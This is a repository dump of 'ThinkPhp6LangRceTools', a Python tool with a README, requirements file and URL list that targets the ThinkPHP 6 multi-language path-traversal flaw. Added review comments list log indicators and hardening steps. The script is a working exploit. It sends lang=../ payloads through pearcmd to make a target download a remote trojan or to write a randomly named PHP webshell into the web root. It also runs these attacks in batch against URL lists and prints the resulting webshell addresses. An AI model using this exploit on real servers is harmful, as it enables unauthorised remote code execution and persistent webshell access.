├── README.md ├── images └── logo.jpg ├── requirments.txt ├── tp6.py └── url.txt /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 |

ThinkPhp6LangRceTools


一个用于自检Thinkphp多语言漏洞的工具


该工具由7coin安全团队强力驱动

## 免责声明

该工具仅供学习和参考。因用于其他用途而产生不良后果,作者不承担任何法律责任。

本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有贡献者不承担任何法律及连带责任。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。

## ThinkPhp6LangRce

一个用于自检Thinkphp多语言漏洞并且可以一键rce的工具,日后再做相关完善。

**注意**

- 本项目仅用于学习交流,请勿用于非法用途
- 如用于非法用法,产生的后果与本项目无关

## Usage:

```py
Usage: "usage:python tp6.py -u/--url -f/--file ","version = 1.0.1"

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     Enter the url to be detected
  -f FILEPATH, --file=FILEPATH
                        Enter a list of urls to detect
  -c CHOOSE, --choose=CHOOSE
                        Choose poc detection or exp detection
  -r REMOTEURL, --remoteurl=REMOTEURL
                        enter a remote link
  -v V                  software version

```

## 漏洞复现

docker pull 7coinsec/thinkphp6013_lang_on

docker run -it -d -p 12345:80 7coinsec/thinkphp6013_lang_on

注:`-p 12345:80` 默认会在宿主机的所有网卡上监听,而该镜像是存在漏洞的靶机;如只需本机访问,可改用 `-p 127.0.0.1:12345:80`。

## Example:

漏洞自检测:

单个poc检测:`python3 tp6.py -u "http://example.com" -c poc`

批量poc检测:`python3 tp6.py -f url.txt -c poc`

Getshell: 注:选择 -r/--remote参数,可以从远程下载木马,这在默认getshell失败时可以尝试

单个getshell:`python3 tp6.py -u "http://example.com" -c exp`

批量getshell:`python3 tp6.py -f url.txt -c exp `

![image-20221212082839826](https://fge7supload-1307552994.cos.ap-shanghai.myqcloud.com/markdown/image-20221212082839826.png)

## 关注我们

--------------------------------------------------------------------------------
/images/logo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/7coinSec/ThinkPhp6LangRceTools/81078dd17a5352b65c92a2c1a9bc1ec2361b8086/images/logo.jpg
--------------------------------------------------------------------------------
/requirments.txt:
--------------------------------------------------------------------------------
# NOTE(review): optparse and os are standard-library modules, not PyPI
# distributions; only requests needs installing. With this file as written,
# `pip install -r` will try to resolve the names optparse and os on the package
# index, i.e. whatever third-party project holds those names, not the stdlib.
optparse
requests
os
--------------------------------------------------------------------------------
/tp6.py:
--------------------------------------------------------------------------------
# Review notes (defender's reading of this script)
#
# What it sends: GET requests to <base>/index.php whose `lang` query parameter
# holds a ../ path-traversal value; the "exp" paths point that value at
# /usr/local/lib/php/pearcmd and append PEAR command arguments.
#
# What to look for in logs and on disk (all taken from the code below):
#   - access-log entries with `lang=` containing `../` and/or `pearcmd`;
#   - files appearing under <webroot>/tmp/pear/download/;
#   - new files in /var/www/html/public/ named 4-5 digits + one letter a-k
#     + ".php";
#   - a user-agent claiming Chrome/91 together with sec-ch-ua claiming
#     version 107, plus the cookie think_lang=zh-cn.
#
# Hardening that removes the preconditions this script relies on: run a
# patched ThinkPHP release, turn the multi-language feature off where it is
# not needed (the lab image name on this page, ..._lang_on, suggests it must
# be on - confirm), keep PEAR/pearcmd out of production images, and leave
# PHP's register_argc_argv off.
import optparse
import requests
import os
import random


# Static header set attached to every request this script makes.
# NOTE(review): the user-agent string says Chrome/91 while sec-ch-ua says
# version 107; the two are inconsistent with each other.
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Cache-Control': 'max-age=0',
    'Cookie': 'think_lang=zh-cn',
    'Proxy-Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'sec-ch-ua': '"Google Chrome";v="107", "Chromium";v="107", "Not=A?Brand";v="24"',
    'sec-ch-ua-mobile': '?0',
    'sec-ch-ua-platform': '"Windows NT 10.0"',
    'sec-fetch-dest': 'document',
    'sec-fetch-mode': 'navigate',
    'sec-fetch-site': 'same-origin',
    'sec-fetch-user': '?1',
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
}

def singlePoc(url):
    """Probe one base URL and print whether it looks affected.

    Requests ``/index.php`` with a path-traversal value in ``lang`` and treats
    an HTTP 500 response as a positive.

    Returns "success" on a positive; returns None for any other status and
    when the request raises.
    """
    requrl = url+"/index.php?lang=../../../../../public/index"

    try:
        req = requests.get(url=requrl, headers=headers, timeout=10)
        # NOTE(review): status 500 is the only signal checked, so any
        # unrelated server error is also reported as vulnerable. Treat a hit
        # as a lead to confirm against the installed framework version.
        if(req.status_code == 500):
            print(url+"存在该漏洞")
            return "success"
        else:
            print(url+"不存在该漏洞")
    except Exception:
        # Every failure (DNS, TLS, timeout, bad URL) collapses into one
        # message; the underlying exception is not shown.
        print(url+"访问时出现错误")


def manyPoc(filepath):
    """Run the same probe as singlePoc for every line of a URL list file.

    Each line of ``filepath`` is used as a base URL as-is (no stripping of a
    trailing slash, no skipping of blank lines). Results are printed only;
    nothing is returned.
    """
    payload = "/index.php?lang=../../../../../public/index"

    with open(filepath,"r") as f:
        urlList = f.read().splitlines()
        for url in urlList:
            requrl = url + payload
            try:
                req = requests.get(url=requrl, headers=headers, timeout=10)
                # Same single-signal heuristic as singlePoc: 500 == positive.
                if (req.status_code == 500):
                    print(url + " 存在该漏洞")
                    continue
                else:
                    print(url + " 不存在该漏洞")
            except Exception:
                print(url + " 访问时出现错误")


def singleExp(url,remoteUrl):
    """Send the pearcmd `install` request for one target, then check the result.

    The second request fetches ``<url>/tmp/pear/download/<last path segment of
    remoteUrl>`` and a 200 there is reported as success. Nothing is returned.

    Defender note: a successful run leaves a file in that ``tmp/pear/download``
    directory under the web root, and the target makes an outbound fetch of
    ``remoteUrl``; both are observable.
    """
    payload = "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+install+-R+.+{}".format(remoteUrl)
    requrl = url + payload  # request URL carrying the lang payload
    hz = str(remoteUrl).split("/")
    shellUrl = url+"/tmp/pear/download/{}".format(hz[-1])  # where the fetched file is expected to be served
    try:
        # The response of the first request is not inspected.
        req = requests.get(url=requrl, headers=headers, timeout=10)
        shellreq = requests.get(url=shellUrl, headers=headers, timeout=10)
        if shellreq.status_code == 200:
            print("webshell address :",shellUrl)
        else:
            print("write shell fail | {}".format(url))
    except Exception:
        # NOTE(review): network errors are reported as "Invalid usage",
        # which hides the real cause.
        print("Invalid usage")


def manyExp(filepath,remoteUrl):
    """Repeat singleExp's two requests for every line of a URL list file.

    Lines of ``filepath`` are used as base URLs unchanged. Output is printed
    only; nothing is returned.
    """
    payload = "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+install+-R+.+{}".format(remoteUrl)
    hz = str(remoteUrl).split("/")
    with open(filepath,"r") as f:
        urlList = f.read().splitlines()
        for url in urlList:
            requrl = url + payload  # request URL carrying the lang payload
            shellUrl = url + "/tmp/pear/download/{}".format(hz[-1])  # where the fetched file is expected to be served
            try:
                req = requests.get(url=requrl, headers=headers, timeout=10)
                shellreq = requests.get(url=shellUrl, headers=headers, timeout=10)
                if shellreq.status_code == 200:
                    print("webshell address :", shellUrl)
                else:
                    print("write shell fail | {}".format(url))
            except Exception:
                print("Invalid usage")

def osSingleExp(url):
    """Variant used when no remote URL is given: shells out to curl.

    Builds a file name from a random integer in 1000..10000 plus one letter
    from the first eleven of the alphabet, runs a curl command line through
    ``os.system``, then requests ``<url>/<name>.php`` and reports a 200 as
    success. Nothing is returned.
    """
    sz = "abcdefghijklmnopqrstuvwxyz"
    shellName = str(random.randint(1000,10000)) + sz[random.randint(0,10)]
    payload = "curl {}/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/+/var/www/html/public/{}.php".format(url,shellName)
    # NOTE(review): the command is assembled by string formatting and run by
    # the local shell. `url` comes straight from the command line and is not
    # quoted, so shell metacharacters in the string are interpreted on the
    # operator's own machine. The exit status of os.system is also ignored.
    os.system(payload)
    shellUrl = url+"/"+shellName+".php"
    # No try/except here, unlike the other functions: a request error
    # propagates to the caller.
    if requests.get(url=shellUrl, headers=headers, timeout=10).status_code == 200:
        print("webshell address :", shellUrl)
    else:
        print("write shell fail | {}".format(url))

    # os.system()

def osAllExp():
    """Placeholder for the list-file variant; only prints "2"."""
    print("2")


def logo():
    """Print the startup banner."""
    print('''=========================================
______ _____ _ _____
|____ / ____| (_) / ____|
/ / | ___ _ _ __ | (___ ___ ___
/ /| | / _ \\| | '_ \\ \\___ \\ / _ \\/ __|
/ / | |___| (_) | | | | |____) | __/ (__
/_/ \\_____\\___/|_|_| |_|_____/ \\___|\\___|


ThinkPHP Lang 漏洞自检工具 by 7CoinSec
========================================= ''')


def main():
    """Parse the command line and dispatch to the poc or exp functions.

    ``-c`` defaults to "poc". In "exp" mode the presence of ``-r`` selects the
    remote-URL functions; without it the curl-based functions are used.
    """
    logo()

    usage = '"usage:python %prog -u/--url -f/--file ","version = 1.0.1"'
    parse = optparse.OptionParser(usage)
    parse.add_option("-u", "--url", dest="Url", type=str, help="Enter the url to be detected")
    parse.add_option("-f", "--file", dest="FilePath", type=str, help="Enter a list of urls to detect")
    parse.add_option("-c", "--choose", dest="choose", default="poc", type=str, help="Choose poc detection or exp detection")
    parse.add_option("-r", "--remoteurl", dest="remoteUrl", default=None, type=str, help="enter a remote link")
    # NOTE(review): -v is registered as an ordinary option that takes a value
    # (the README's usage shows "-v V"); nothing below reads it or prints a
    # version.
    parse.add_option("-v", help="software version")
    options, args = parse.parse_args()

    if options.choose == "poc":
        # Both checks are independent: -u and -f together run both probes.
        if options.Url != None:
            singlePoc(options.Url)
        if options.FilePath != None:
            manyPoc(options.FilePath)

    elif options.choose == "exp":
        if options.Url != None and options.remoteUrl != None:
            singleExp(options.Url, options.remoteUrl)
        elif options.FilePath != None and options.remoteUrl != None:
            manyExp(options.FilePath, options.remoteUrl)
        elif options.Url != None and options.remoteUrl == None:
            osSingleExp(options.Url)
        elif options.FilePath != None and options.remoteUrl == None:
            osAllExp()
        # NOTE(review): the two branches below cannot be reached; every case
        # with Url or FilePath set is already handled by the four above.
        elif options.Url != None:
            print("Please enter the remote Trojan address, example: python3 tp6.py -c exp -u 'http://example.com' -r/--remote \"http://example.com/shell.php\"")
        elif options.FilePath != None:
            print("Please enter the remote Trojan address, example: python3 tp6.py -c exp -f filePath -r/--remote \"http://example.com/shell.php\"")

    else:
        print("Please choose poc detection or exp detection, example: python3 tp6.py -c poc/exp -u 'http://example.com'")




if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/url.txt:
--------------------------------------------------------------------------------
http://test.com
http://fuck.om
http://iiiii.com
http://test1.com
http://127.0.0.1:12345/
--------------------------------------------------------------------------------